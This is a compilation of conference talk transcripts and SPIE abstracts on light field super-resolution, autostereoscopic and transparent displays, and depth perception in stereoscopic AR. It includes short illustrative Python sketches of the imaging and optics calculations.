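The equations themselves are on the slides; a common form consistent with the description is E(x, d) = sum_k || y_k - D B M_k(d) x ||^2, where y_k are the sub-aperture images, D is subsampling, B the blur and M_k(d) the depth-dependent shift. Under the stated assumptions (symmetric, spatially invariant blur; integer pixel shifts), both A_k = D B M_k and its transpose reduce to plain image operations, as in the sketch below. A single global integer shift per view stands in here for the per-pixel, depth-derived motion of the paper, and the blur and step-size values are illustrative.

```python
import numpy as np
from scipy.ndimage import gaussian_filter, shift as nd_shift

SCALE = 3          # super-resolution factor (3x in the paper's experiment)
BLUR_SIGMA = 1.0   # assumed symmetric, spatially invariant blur

def apply_A(x, shift_k):
    """A_k x = subsample( blur( shift(x) ) )."""
    moved = nd_shift(x, shift_k, order=0)          # integer pixel shift M_k
    blurred = gaussian_filter(moved, BLUR_SIGMA)   # symmetric blur B
    return blurred[::SCALE, ::SCALE]               # subsampling D

def apply_At(y, shift_k):
    """A_k^T y = reverse_shift( blur( upsample_with_zeros(y) ) )."""
    up = np.zeros((y.shape[0] * SCALE, y.shape[1] * SCALE), dtype=float)
    up[::SCALE, ::SCALE] = y                       # D^T: insert zeros
    blurred = gaussian_filter(up, BLUR_SIGMA)      # B^T = B
    return nd_shift(blurred, [-s for s in shift_k], order=0)  # M_k^T

def sr_gradient_step(x, observations, shifts, step=0.1):
    """One gradient-descent step on sum_k ||y_k - A_k x||^2 with the
    depths (here: the shifts) held fixed."""
    grad = np.zeros_like(x)
    for y_k, s_k in zip(observations, shifts):
        residual = apply_A(x, s_k) - y_k
        grad += apply_At(residual, s_k)
    return x - step * grad
```

In the full method the shifts would be recomputed from the refined depth map between super-resolution steps, which is what the alternating procedure above describes.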
The number of sub-aperture images is 25. First we compare the estimated high resolution images. The left image is calculated by bi-cubic interpolation, the center image is super-resolution reconstruction without depth refinement, and the right image is calculated by the proposed method, which is super-resolution reconstruction with depth refinement. Let me show close-ups of these images: on the left is bi-cubic interpolation, in the center is SR without depth refinement, and on the right is the proposed method. Comparing these, we found that the proposed method produces clearer images. On the left is the depth before refinement, which is calculated by stereo matching; on the right is the depth after refinement. The energy function E is plotted against the number of iterations in this graph. The blue line is super-resolution without depth refinement and the other line is the proposed method. In this graph, the proposed method reduces the energy function E compared to super-resolution reconstruction without depth refinement. Now let me summarize my presentation. We proposed a method for joint estimation of high resolution images and depth maps from light field cameras to overcome the drawback of light field cameras. The key concept is that the depth resolution should also be increased along with the super-resolution reconstruction, so the depth refinement is conducted alternately with the resolution enhancement of the image. As the experimental result, we improved the high resolution image compared to super-resolution without depth refinement. As future work, we will improve the depth refinement to obtain a more accurate depth map. Thank you for your attention.
|
Light field cameras are attracting much attention as tools for acquiring 3D information of a scene through a single camera. The main drawback of typical lenselet-based light field cameras is the limited resolution. This limitation comes from the structure where a microlens array is inserted between the sensor and the main lens. The microlens array projects 4D light field on a single 2D image sensor at the sacrifice of the resolution; the angular resolution and the position resolution trade-off under the fixed resolution of the image sensor. This fundamental trade-off remains after the raw light field image is converted to a set of sub-aperture images. The purpose of our study is to estimate a higher resolution image from low resolution sub-aperture images using a framework of super-resolution reconstruction. In this reconstruction, these sub-aperture images should be registered as accurately as possible. This registration is equivalent to depth estimation. Therefore, we propose a method where super-resolution and depth refinement are performed alternatively. Most of the process of our method is implemented by image processing operations. We present several experimental results using a Lytro camera, where we increased the resolution of a sub-aperture image by three times horizontally and vertically. Our method can produce clearer images compared to the original sub-aperture images and the case without depth refinement. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32369 (DOI)
|
Thank you for the introduction. My presentation is about an autostereoscopic display system. This is the outline of my talk. First I will discuss the present problems of autostereoscopic display methods. Then I will show some examples of autostereoscopic display methods based on forming exit pupils for both eyes. Then I will show the principle of a multi-user autostereoscopic display based on direction-controlled illumination using a slanted cylindrical lens array. Then I will show the experimental results for verification of our proposed method, and I will discuss some issues, especially about illumination uniformity. Then I will conclude my talk. Nowadays many 3D movies are released and we can buy 3D TVs, but usually we use 3D glasses for providing binocular parallax. Much research on autostereoscopic displays exists, and most such displays use a parallax barrier or a lenticular sheet. Systems based on a parallax barrier or a lenticular sheet have some problems, such as resolution degradation because of the optical devices on the LCD panel and the restriction of the viewing points. This is an example of an autostereoscopic display based on projection. This type of display has a very large viewing region and no degradation of the image resolution. Here there are many projectors, and real images of the pupils of the projectors are formed by using a field lens attached with a diffuser. Each pupil of the projectors is imaged around the viewing zone, and we can see the different parallax images through the corresponding pupils. The demerits of this method are that a large volume for the many projectors is required and it has a high cost. This shows an autostereoscopic display based on forming a pupil for both eyes. Here are the eyes; this system forms an exit pupil around the eyes. The system has a head tracking system, which detects the position of both eyes, and the exit pupil is formed around the eyes. This has the merits of a large viewing region, no degradation of the image resolution, and lower cost than the multi-projector system. This system consists of the image display unit, which is implemented by an LCD display, and the direction control unit. This shows an example of an autostereoscopic display using spatially distributed light sources and a condenser lens. In this case, here is the light source array and this is a transmission-type display panel, realized with an LCD, and a condenser lens is attached to the display panel. The light source is made with this LCD, and the image of the light source is formed around the viewing position. The head tracking system detects the position of both eyes, and according to the position of the viewer the light source position is changed, so the exit pupil is located at the viewer's eyes using the head tracking system. This is good as a cost-effective system with no degradation of the image resolution, but it has a restriction: the position of the exit pupil is fixed at a certain distance from the display panel because of this kind of imaging system. This is another example of an autostereoscopic display, proposed by Surman, which uses slanted stacks of cylindrical lenses. This can expand the position of the exit pupil in the depth direction.
This is a steering optical system that controls the horizontal direction of the illuminating light for each horizontal position, and the system forms the pupils around the eyes for stereoscopic viewing. The drawback of this system is non-uniformity of illumination, which is caused by the use of a discrete optical system; this causes discontinuity of the illumination. So the purpose of this study is improvement of the MUTED method. We propose an autostereoscopic display method based on a principle similar to the MUTED method, utilizing a continuous optical element for the steering optical system to improve the illumination uniformity, while maintaining the characteristics of the MUTED system, such as high resolution, large image size, no restriction of the viewing position, availability for multiple viewers, and a compact system configuration. Now I will show the experimental system for verification of our proposed method. This is the proposed system; it consists of the image display unit and the direction-controlled illumination unit. The image display unit is implemented with an ordinary LCD panel, and the illuminating light has a controlled horizontal direction. The direction-controlled illumination unit consists of a spatially modulated parallel light source, a slanted cylindrical lens array, and vertical light diffusing sheets. We call this the steering optical system. This shows a light ray incident on the cylindrical lens. The incident light into the cylindrical lens is deflected at an angle depending on the distance from the center line of the cylindrical lens. It is also possible to change the position of the light ray without changing the direction angle by changing the incident position in the direction parallel to the center line of the cylindrical lens. This shows the light in the vertical direction. Here is the cylindrical lens; after passing the cylindrical lens, the light is deflected, and we use a directional diffusing sheet for diverging the light in the vertical direction. The second diffusing sheet is for deflecting the light to the viewer. About this distance: enough distance is required for illuminating the whole area of the image display. Here is the LCD panel, so enough distance is required for illuminating the whole area. This system can control the horizontal direction of the light propagation and the position of the long strip line of illumination. By changing the incident position on the cylindrical lens, we can concentrate the light from the display panel at a certain position by controlling the direction of the light propagation for each position. We call this incident pattern the control pattern. We use a control pattern like this, so the exit pupil is formed around the viewing area; it is possible to form an exit pupil using this system. An observer can watch the image on the image display when the exit pupil is at the position of the eyes, and the autostereoscopic view is achieved by switching the parallax image on the display panel in accordance with the alternately changing exit pupil position. It is possible to accommodate multiple viewers without restriction within the viewing region. And this shows the reduction of the system size using multiple cylindrical lenses.
Previously I talked about this distance, but it is possible to reduce the distance using multiple cylindrical lenses without expanding the diffusing angle of the first diffusing sheet. The whole LCD area is illuminated by the combination of the split light emitted from each cylindrical lens. The merits of the proposed method are: first, there is no optical element after the display panel that degrades the image resolution; it provides multiple viewing points without restriction; and a compact and cost-effective realization is possible compared with the multi-projector methods. The advantage of the proposed method over the MUTED method is the uniformity of illumination, which comes from the use of a long cylindrical lens instead of the stacked lenses. This shows the relation between the position of the viewer and the control pattern; this is the pattern incident on the cylindrical lens, and this equation shows the relation between the viewer position and the pattern. It describes a straight line, and the inclination of this line depends on the depth of the position of the observer. The lateral position of the exit pupil is related to the lateral shift of this control pattern. This shows the viewing region. Here is the LCD panel and here is the steering optical system. It depends on A, the width of the cylindrical lens, and Fc, the focal length; the size of the viewing region depends on the numerical aperture of the cylindrical lens. We constructed an experimental system for verification. Here is the LCD panel for image display, and here is a projector for the control pattern, which provides the incident light for the cylindrical lens. Here is the cylindrical lens array, and we placed a Fresnel lens before the cylindrical lens array. Here is the directional diffusing sheet for vertically diverging the light. This is the configuration of the experimental system. The focal length of the Fresnel lens is 1200 millimeters, and here is the cylindrical lens array, used with measures to suppress stray light. We used three directional diffusing sheets: two sheets are necessary, but we used three for suppressing the moire effect, because we used a high-pitch lenticular sheet and some moire occurred, so we suppressed the moire by using three diffusers. Here is the LCD panel; it is full HD, 32 inches. This shows the images detected: a camera is placed at the position of the exit pupil for each eye. The image was not observed at any position except the exit pupil, which demonstrates the formation of the exit pupil by the proposed method. The maximum viewing angle is 80 degrees, and the angular resolution, the minimum controllable angle, is 0.4 degrees; this depends on the resolution of the control pattern and the focal length of the cylindrical lens. Then we measured the irradiance distribution around the exit pupil for evaluating the crosstalk between both parallax images. The width at half maximum is 5 centimeters, so the crosstalk is small enough to view a stereoscopic image. Now I will consider some issues, first the improvement of illumination uniformity. This shows a photograph: the panel shows a white image, but we can find some non-uniformity of the illumination, especially these steps; a luminance dip is caused by the discontinuity of the cylindrical lenses or the control pattern at these points.
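As a paraxial illustration of how the control pattern relates to the viewer position (the actual system includes the slanted lenses and a Fresnel lens, so the real mapping needs calibration): a parallel ray entering a cylindrical lens of focal length f_c at lateral offset d from its centre line leaves deflected by roughly -d/f_c, so steering every strip of the panel toward a viewer at (x_v, z_v) gives offsets that form a straight line whose slope depends on the viewer depth and whose lateral shift follows the viewer's horizontal position, matching the description above.

```python
import numpy as np

def control_pattern_offsets(strip_positions, viewer_x, viewer_z, f_c):
    """Paraxial sketch: for each horizontal strip position x_s on the
    panel, the lateral offset (from the cylindrical lens centre line) at
    which the parallel illumination must enter so that the deflected ray
    passes through the viewer at (viewer_x, viewer_z). A parallel ray at
    offset d leaves at angle ~ -d/f_c, hence d = -f_c*(viewer_x - x_s)/viewer_z.
    Signs and the slanted-lens geometry are simplified."""
    strip_positions = np.asarray(strip_positions, dtype=float)
    return -f_c * (viewer_x - strip_positions) / viewer_z

# Example (illustrative numbers): a 0.7 m wide panel, 50 mm focal length,
# viewer 1.5 m away and 10 cm off-centre.
xs = np.linspace(-0.35, 0.35, 8)
print(control_pattern_offsets(xs, viewer_x=0.10, viewer_z=1.5, f_c=0.05))
```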
One improvement for suppressing this luminance dip is to modulate the control pattern with a graduated pattern. The luminance distribution obtained with this graduated pattern improves the discontinuity of the illumination. Another cause of the non-uniformity is jaggies in the control pattern: if the width of the control pattern is comparable to the pixel size, the jaggies can be clearly observed, and then we can see aliasing patterns, such as striped patterns and vertical stripes. One improvement for this illumination non-uniformity is smoothing and blurring of the control pattern, that is, anti-aliasing methods; the vertical stripes are suppressed like this. There are some other issues: a head tracking system, further improvement of the power efficiency, and a more compact implementation are required. This is the conclusion of my talk. Thank you. Thank you.
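A minimal sketch of the anti-aliasing step mentioned above: blur the thin binary control pattern slightly so that its one-pixel jaggies become graded ramps instead of hard steps. The blur radius is an illustrative value, not taken from the paper.

```python
import numpy as np
import cv2

def antialias_control_pattern(binary_pattern, sigma_px=0.8):
    """Soften the projected control pattern so 1-pixel jaggies turn into
    graded grey ramps; sigma_px is an assumed, illustrative value."""
    return cv2.GaussianBlur(binary_pattern.astype(np.float32), (0, 0), sigma_px)
```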
|
This research aims to develop an auto-stereoscopic display, which satisfies the conditions required for practical use, such as, high resolution and large image size comparable to ordinary display devices for television, arbitrary viewing position, multiple viewer availability, suppression of nonuniform luminance distribution, and compact system configuration. In the proposed system, an image display unit is illuminated with a direction-controlled illumination unit, which consists of a spatially modulated parallel light source and a steering optical system. The steering optical system is constructed with a slanted cylindrical array and vertical diffusers. The direction-controlled illumination unit can control output position and horizontal angle of vertically diffused light. The light from the image display unit is controlled to form narrow exit pupil. A viewer can watch the image only when an eye is located at the exit pupil. Auto-stereoscopic view can be achieved by alternately switching the position of an exit pupil at viewer's both eyes, and alternately displaying parallax images. An experimental system was constructed to verify the proposed method. The experimental system consists of a LCD projector and Fresnel lenses for the direction-controlled illumination unit, and a 32 inch full-HD LCD for image display. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32372 (DOI)
|
My name is Mikko Kytö, and I will present our study on depth perception in stereoscopic augmented reality. The motivation for the study is that the perceptual problems are huge in augmented reality environments, and depth perception is actually the largest perceptual problem in AR applications. So how could this situation be improved? We approach this problem by adding more depth cues to the scene, but the question is which depth cues should be added and how they should be added. Here is the context of this presentation: it uses a video see-through augmented reality system, shown here. Here is the HMD, the head-mounted display. We focus on distances within action space, that is, distances from 2 to 30 meters. Most depth perception studies have been conducted within the personal space range, meaning tasks such as grasping, endoscopic surgery, and other very close range tasks, but we focus on action space and objects that are above a ground plane. Here is a schematic figure of virtual objects above a ground plane. This figure shows the depth sensitivities of different depth cues as a function of depth, and in this study we focus on action space. We can see that the depth cues change a lot according to depth. The way to read this figure is that, for example, at a 10 meter distance the depth sensitivity is 0.06, which means that an observer can approximately perceive a depth threshold, depicted as delta z in the figure, of about 0.6 meters. So this figure shows how accurately people use depth cues on average; it is a simplification, but it is a good rule of thumb. Our question was which depth cues should be added to the scene in applications within action space. When we start from the top of the figure, from the most sensitive depth cues, we see occlusion first, then height in the visual field, relative size, motion parallax and binocular disparity. So those are the most sensitive depth cues within action space. How should these depth cues be added to the scene? Here is our approach, which uses virtual aid objects called auxiliary augmentations. If we look at the figure shown here, an observer is looking at a virtual arrow within the scene. It is surrounded by physical objects, and the observer has difficulties perceiving the position of the arrow. For example, in video see-through handheld devices, the errors in depth perception are on the order of 50% of the depth, so it is not obvious where the arrow is in the scene. Our approach uses auxiliary augmentations that are anchored to the real world, so that the position of these auxiliary augmentations can be perceived correctly. Once their position has been perceived correctly, the observer can compare the depth of the augmented object of interest to the auxiliary augmentations, and relative depth cues among the augmentations can be used. In this case, for example, if we occlude the auxiliary augmentations correctly, we can very efficiently anchor them to the scene. In this study, we focus on action space and objects above a ground plane, so we can ask where to add these auxiliary augmentations; they are shown in green in this figure. First of all, you have to limit the disparity range for the objects.
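The rule of thumb quoted above can be written down directly; the sensitivity values themselves have to be read off a cue-sensitivity chart like the one shown in the talk.

```python
def just_noticeable_depth(distance_m, sensitivity):
    """Rule of thumb from the talk: a cue with depth sensitivity s at
    viewing distance z gives a just-noticeable depth difference of
    roughly dz = s * z (e.g. 0.06 * 10 m = 0.6 m). The sensitivity value
    depends on the cue and distance and comes from a chart, not from
    this function."""
    return sensitivity * distance_m

print(just_noticeable_depth(10.0, 0.06))  # ~0.6 m, the example in the talk
```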
And take into account the disparity gradient, shown here, since we want to avoid diplopic images. The horizontal position of the augmentations should also be limited so that unnecessary head movements can be avoided, meaning the objects should be horizontally close to the AOI. In addition, the vertical position should be limited: it has been shown that ground perception is a very important issue within action space, so we want to guide the observer's attention towards the ground, and thus we visualize these auxiliary augmentations below the eye level. On the right there is an example stimulus used in our experiment. The auxiliary augmentations are anchored to the scene using shadows, and there is one auxiliary augmentation near and one far, and the position of the AOI is judged by the participants. Here is the experimental setup that we used. We had 18 participants. The stereo variable had mono and stereo conditions, and the auxiliary augmentation variable had two conditions, with and without AAs. The height of the AOI was varied between half a meter and one meter, and the distance of the AOI was varied between 6, 7, 8 and 10 meters. All the combinations were shown twice to the observers. This is the video see-through display we used in the experiments. For recording the judgments from the observers we used a physical pointer: the observer pulled strings with both hands to adjust the position of the physical pointer to the same distance as they perceived the augmented object of interest. And here is the same situation from the side. Here are some of the results of the study. We can see that the stereo variable had a significant effect on the judgments, and the AA condition also had a significant effect; the most accurate depth judgments were achieved when these cues were combined. There was a lot of variation between the slopes of the judgments; for example, when the objects were one meter above the ground, the slope of the judgments in the mono condition was only about 0.09, while with the most accurate condition the slope was 0.95. In addition, the height position had a significant effect on the judgments, especially with the mono condition, but the effect was smaller with the stereo condition. The confidence of the judgments was also measured, and the results are quite similar to the depth judgments: the confidence varied significantly according to the viewing condition, and the height position had an effect on the confidence judgments. We can also conclude that the ground has a significant effect on the judgments: the closer the objects were to the ground, the more confident the answers were. There was also an interaction effect between distance and height position: at near distances the height position had more influence on the confidence of the judgments. As discussion, the slopes varied a lot between viewing conditions, and relative size affected the scaling of the disparity, meaning that when the relative size cue was available in the scene, the disparity was scaled more correctly. Depth and confidence judgments were less affected by the height position with the stereoscopic viewing condition. In conclusion, stereoscopic perception and relative size were combined in an additive manner, so that depth perception was most accurate when the cues were combined.
And this auxiliary augmentation approach is applicable in situations where the augmented object of interest cannot itself be anchored to the real world. This is, for example, the case when the AOI is viewed from perspectives that hide the ground plane, for example through windows, or in cases where the ground is not visible. Also, in cases where the augmented object of interest is behind a wall, this approach has been shown to be very useful in a previous study. It also applies in situations where the AOI is too far away to be accurately anchored; for example, the accuracy of many depth sensors decreases as a function of depth. So if we position the auxiliary augmentation near the viewer, then we can deduce the position of an AOI that is quite far away using relative depth cues. Thank you for your time, and I may have time for questions.
|
CONTEXT: Depth perception is an important component in many augmented reality (AR) applications. It is, however, affected by multiple error sources. Most studies on stereoscopic AR have focused on the personal space whereas we address the action space (at distances beyond 2 m; in this study 6-10 m) using a video see-through display (HWD). This is relevant for example in the navigation and architecture domains. OBJECTIVE: For design guideline purposes there is a considerable lack of quantitative knowledge of the visual capabilities facilitated by stereoscopic HWDs. To fill the gap two interrelated experiments were conducted: Experiment 1 had the goal of finding the effect of viewing through a HWD using real objects while Experiment 2 dealt with variation of the relative size of the augmentations in the monoscopic and binocular conditions. METHOD: In Experiment 1, the participants judged depths of physical objects in a matching task using the Howard-Dolman test. The order of viewing conditions (naked eyes and HWD) and initial positions of the rods were varied. In Experiment 2, the participants judged the depth of an augmented object of interest (AOI) by comparing the disparity and size to auxiliary augmentations (AA). The task was to match the distance of a physical pointer to same distance with the AOI. The approach of using AAs has been recently introduced (Kytö et al. 2013). The AAs were added to the scene following literature-based spatial recommendations. RESULTS: The data from Experiment 1 indicated that the participants made more accurate depth judgments with HWD when the test was performed first with naked eyes. A hysteresis effect was observed with a bias of the judgments towards the starting position. As for Experiment 2, binocular viewing improved the depth judgments of AOI over the distance range. The binocular disparity and relative size interacted additively; the most accurate results were obtained when the depth cues were combined. The results have similar characteristics with a previous study (Kytö et al. 2013), where the effects of disparity and relative size were studied in X-Ray visualization case at shorter distances. Comparison of the two experiments showed that stereoscopic depth judgments were more accurate with physical objects (mean absolute error 1.13 arcmin) than with graphical objects (mean absolute error 3.77 arcmin). NOVELTY: The study fills the knowledge gap on exocentric depth perception in AR by quantitative insight of the effect of binocular disparity and relative size. It found that additional depth cues facilitate stereoscopic perception significantly. Relative size between the main and auxiliary augmentations turned out to be a successful facilitator. This can be traced to the fact that binocular disparity is accurate at short distances and the accuracy of relative size remains constant at long distances. Overall, these results act as guidelines for depth cueing in stereoscopic AR applications.
|
10.5446/32374 (DOI)
|
Thank you for the introduction. And I also want to say thank you to Mr. Stephen Kies for helping us these days. Okay, good afternoon, everyone. As the title shows, today I would like to introduce a time-division multiplexing parallax barrier based on primary colors. My name is Chi Zhang and I am from the University of Tsukuba, Japan. I will start from the background. As introduced in the first presentation of this session, the conventional parallax barrier is easily attachable and has already been used in some products. However, it suffers from two main issues: low resolution per view and a narrow viewing zone. The first issue can be resolved by a time-division multiplexing (TDM) parallax barrier or with ultra-high-resolution panels, while head tracking is regarded as a helpful way to address the second issue. By tracking the position of the viewer and adjusting the barrier accordingly, the sweet spots can be extended. However, since the range of each sweet spot is very narrow, both high precision and a short response time are required for the head tracking involved. Furthermore, barrier panels made of LCDs cannot be adjusted smoothly since they have a minimum shift of one pixel, so as shown here, some areas cannot be covered perfectly, and a perfectly continuous viewing zone is impossible. We have been working on a high quality autostereoscopic system based on a TDM parallax barrier, which shows full panel resolution per view and holds a continuous viewing zone with common head tracking involved. And here is the method. First, we set the aperture ratio to one quarter, so the system becomes a four-view system. Then, with quadruple TDM applied, full resolution per view can be achieved, where one frame shows one quarter of the resolution and four frames show the complete four views. So here are the four views. If we apply the left image of a stereo pair to the left viewpoints D and C and show the right one to the viewpoints B and A, the system turns into a two-view system with a wider viewing zone. In detail, the viewing zone of each eye can be determined by these lines, and it is plain to see that if we set the distance between A and C to the eye distance, the widest viewing zone is achieved, where the width of the sweet spots is half the eye distance and the viewing zone of autostereoscopy has a diamond shape like this. We define the ideal viewing distance as D0. Then the viewing zone of this system can be extended from two thirds of D0 to twice D0, as shown here. Now just imagine we have head tracking and shift the barrier by one pixel. You can see from here that the adjoining two viewing zones share enough space so that a continuous viewing zone is available. We carried out a prototype based on two LCDs, and the specifications are listed here. We also used an AMD GPU which supports Eyefinity technology and DisplayPort to ensure that the images on the two panels are strictly synced. And as a result, a continuous viewing zone without crosstalk has been achieved with common head tracking involved. However, in this system flicker stands out. It is widely known that a refresh rate of 240 Hz is required for flickerless quadruple TDM, while such LCDs are still rare at this moment. So we proposed an improvement called 1-pixel aperture, based on sensory properties, to remove flickers. You may refer to our last paper to find the details of this method. So here is the overall structure of the improved system. You may see some adjustments here, like the order of the panels, and also that we inserted a diffuser here.
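The viewing-zone geometry quoted above can be summarized in a few lines; the numeric defaults below (65 mm eye separation, 0.6 m ideal distance) are illustrative assumptions, not the prototype's specifications.

```python
def four_view_zone_parameters(eye_separation_m=0.065, ideal_distance_m=0.60):
    """Geometry quoted in the talk for the 4-view TDM barrier driven as a
    2-view system (left image on views D, C; right image on views B, A):
    when the A-C spacing equals the eye separation, each sweet spot is
    half an eye separation wide and the usable depth range runs from
    2/3 * D0 to 2 * D0."""
    sweet_spot_width = eye_separation_m / 2.0
    z_near = 2.0 * ideal_distance_m / 3.0
    z_far = 2.0 * ideal_distance_m
    return sweet_spot_width, (z_near, z_far)

print(four_view_zone_parameters())  # (0.0325, (0.4, 1.2)) for the assumed numbers
```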
But the main concept of the proposed method has been kept. Since this barrier type uses a barrier laid out like white-black-black-black, we call this barrier type WKKK. With this WKKK system, high quality autostereoscopy has been achieved, but still one issue remains. In the current system, when the viewer blinks or makes a saccade, a uniform stripe pattern will be seen, as shown in this picture. In such situations, humans become more sensitive to the 60 Hz change, where the pattern from two frames becomes striking in this system. As you see, WKKK plus KWKK creates a WWKK stripe pattern. This kind of noise is similar to flicker, where a lack of refresh rate takes place. So to weaken the stripe noise, we proposed a barrier based on TDM anaglyph. As you see here, we use a barrier like green, black, magenta, black, and we call it GKMK. It also takes four frames to show the four complete views, but the pattern from two frames turns into GGMM. It is widely known that human perception of luminance weights the R, G and B components differently, and from those percentages we may estimate the luminance distribution of the stripes like this. It is plain to see that green and magenta hold closer luminance values and may show weaker stripe noise. Here is the result: by using green and magenta anaglyph, the stripe noise becomes much weaker. However, using anaglyph increases crosstalk. As shown here, when showing the letters A and B as a stereo pair, a ghost of B will be seen from the sweet spot of A. RGB color filters on LCDs share a certain range of wavelengths, as shown in this graph, which means that they cannot separate colors perfectly. If you define the shared areas as P and Q, then the crosstalk quantity of each anaglyph mode can be estimated like this. It is plain to see that the mode we used holds the largest crosstalk quantity. On the other hand, red and blue anaglyph shows less crosstalk, but since the range of wavelengths is narrow, the crosstalk will have a certain color tone. So as a short summary, it seems that a tradeoff between crosstalk and stripe noise exists, and it is difficult to deal with the two issues at the same time. So we would like to propose a method which may bring more balanced results. Here is the new method: we call it a parallax barrier based on primary colors. As you see here, it holds a barrier laid out like RGBK, and it also takes four frames to show the four complete views. Since we show the same images to viewpoints A, B and to C, D, the color filtering in this system will be like this: only red-cyan anaglyph and yellow-blue anaglyph take place. So we can estimate the quantity of crosstalk of each pixel like this, and the average crosstalk will be like this. It is plain to see that, compared to green-magenta anaglyph, the crosstalk becomes much less and also stays away from a color tone. On the other hand, the pattern from two frames has jumps in luminance values, so relatively strong stripe noise may take place. In this kind of barrier type, changing the order of the colors may change the results. You may see from here that the RGBK alignment shows less crosstalk, whereas the other type, RBGK, shows less stripe noise, as here: the luminance distribution is more even and relatively weaker stripe noise may take place, while on the other hand the crosstalk may increase a bit. We carried out an experiment to find out how the barrier types perform. The following five barrier types were involved in the experiments. First, crosstalk. The detailed information on this experiment is listed here, and the result is here.
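To see why green-magenta stripes flicker less than white-black ones, and why RBGK is more even than RGBK, one can sum the barrier pattern over two consecutive frames and weight the result by a luminance model. The Rec. 709 luma weights and the assumption that the pattern simply shifts by one element per frame are stand-ins for the authors' actual percentages and drive scheme.

```python
import numpy as np

# Rec. 709 luma weights as a stand-in for the perceptual RGB weighting
# mentioned in the talk (the authors' exact percentages are not given here).
LUMA = np.array([0.2126, 0.7152, 0.0722])

COLORS = {
    "W": (1, 1, 1), "K": (0, 0, 0), "R": (1, 0, 0),
    "G": (0, 1, 0), "B": (0, 0, 1), "M": (1, 0, 1),
}

def stripe_luminance_over_two_frames(pattern):
    """Per-position luminance of the barrier pattern summed over two
    consecutive TDM frames, assuming the pattern is simply shifted by one
    element each frame (an assumption about the drive scheme)."""
    rgb = np.array([COLORS[c] for c in pattern], dtype=float)
    shifted = np.roll(rgb, 1, axis=0)   # next frame's barrier
    return (rgb + shifted) @ LUMA       # summed luminance per stripe

for p in ("WKKK", "GKMK", "RGBK", "RBGK"):
    lum = stripe_luminance_over_two_frames(p)
    print(p, np.round(lum, 3), "spread:", round(lum.max() - lum.min(), 3))
```

With these assumptions the two-frame luminance spread comes out largest for WKKK, smallest for GKMK, and smaller for RBGK than for RGBK, which matches the qualitative ordering described in the talk.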
You may see that without anaglyph the mark is highest and with green-magenta the mark is lowest, and the newly proposed mode RGBK shows a high mark, as expected. Then stripe noise: you may see from here that the RGBK-type modes show close marks, so we can see that human beings cannot tell the difference once the stripe noise gets weak. Then we show the two results on one graph. Maybe not perfectly, but you can see that a tradeoff exists here, and the newly proposed modes based on primary colors, RGBK and RBGK, together with the R mode, all show more balanced results. Among them, RGBK is considered to be more practical since it shows less crosstalk. Here is the conclusion. For the future, we are considering using displays with a higher refresh rate, since LCDs with a refresh rate of 144 Hz have already appeared on the market. That's all. Thank you for your attention.
|
4-view parallax barrier is considered to be a practical way to solve the viewing zone issue of conventional 2-view parallax barrier. To realize a flickerless 4-view system that provides full display resolution to each view, quadruple time-division multiplexing with a refresh rate of 240 Hz is necessary. Since 240 Hz displays are not easily available yet at this moment, extra efforts are needed to reduce flickers when executing under a possible lower refresh rate. In our last work, we have managed to realize a prototype with less flickers under 120 Hz by introducing 1-pixel aperture and involving anaglyph into quadruple time-division multiplexing, while either stripe noise or crosstalk noise stands out. In this paper, we introduce a new type of time-division multiplexing parallax barrier based on primary colors, where the barrier pattern is laid like “red-green-blue-black (RGBK)”. Unlike other existing methods, changing the order of the element pixels in the barrier pattern will make a difference in this system. Among the possible alignments, “RGBK” is considered to be able to show less crosstalk while “RBGK” may show less stripe noise. We carried out a psychophysical experiment and found some positive results as expected, which shows that this new type of time-division multiplexing barrier shows more balanced images with stripe noise and crosstalk controlled at a relatively lower level at the same time. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32375 (DOI)
|
So, my talk will be about transparent stereoscopic displays and applications. Let me first start with a small motivation: why transparency? You see on the left an image from a Swiss train station. You see these typical information panels, which are huge, hanging from the ceiling, giving information about the departures of the trains. And on the right hand side you see a typical scene if you go shopping, where you see some promotions in the shop window. Both images share something in common: they expose important information to a viewer, but they also block important content from the background. The third image I took from our lab; it's actually our lab kitchen. On the right hand side you see the most important thing in the lab, the coffee machine. But more important for this talk is the fridge, because people just put their stuff in the fridge, the expiry date passes, and it starts smelling. So what do we want to say with this picture? It would be very convenient for us as users if the door of the fridge were transparent, and also 3D, such that next to each item in the fridge we could display information about the owner of the item and also about the expiry date or something like this. So transparency will definitely add value to our environment, since we can augment it with virtual information. The idea of the transparent fridge has been picked up by industry already: LG and also Samsung, I think, have these fridges with transparent doors. Samsung has this light box, which we already heard about earlier today, where you can put some item inside of it and put some information on the front. Both are based on LCD technology. The problem with LCD is that, if it's a black and white LCD, it absorbs at least 50% of the light due to the underlying technology, and if you want a color screen it absorbs even more light. So these technologies can only be deployed in environments with a controlled background light, and usually the backlight has to be very strong to get these nice images, as we can see here. Another display technology which I like a lot is from Sun Innovations. They deploy a phosphor material inside of a glass panel. This phosphor material can be activated by a certain wavelength of light, so it's a projection setup and the screen becomes self-emissive; a very nice technology. And also something to mention here are head mounted displays, which can also overlay virtual information onto reality. Now for the rest of the talk, I want to focus more on back-projection kinds of screens like the one on the right. But we used simpler ones in our project, and we compared two kinds of transparent back-projection screens. The first, the top one, is the isotropic back-projection screen. The way it works is that usually they deploy small droplets inside a transparent material. Most of the light will just pass through, which gives the screen its transparent, clear character, but some of the light will scatter at these droplets and make a projected image visible. It's isotropic because you can put the projector at any position behind the screen and it will work. A little bit more complex is the anisotropic back-projection foil or glass, which only selectively diffuses light. The one we used is holography based, so it's a diffraction grating, and it selectively diffuses the light only from one center of projection, which means all light from the environment will just pass through, giving again a transparent screen.
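The transcript does not say which contrast metric was used for the checkerboard comparison coming up next; Michelson contrast over the bright and dark squares is one reasonable choice and would be computed like this:

```python
import numpy as np

def michelson_contrast(bright_patch, dark_patch):
    """Michelson contrast from the mean intensities of the white and
    black checkerboard squares in a captured photo."""
    lo, hi = float(np.mean(dark_patch)), float(np.mean(bright_patch))
    return (hi - lo) / (hi + lo + 1e-9)

def contrast_retention(bright_no_screen, dark_no_screen, bright_screen, dark_screen):
    """Ratio of the checkerboard contrast seen through the screen to the
    ground-truth contrast captured without any screen."""
    return (michelson_contrast(bright_screen, dark_screen)
            / michelson_contrast(bright_no_screen, dark_no_screen))
```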
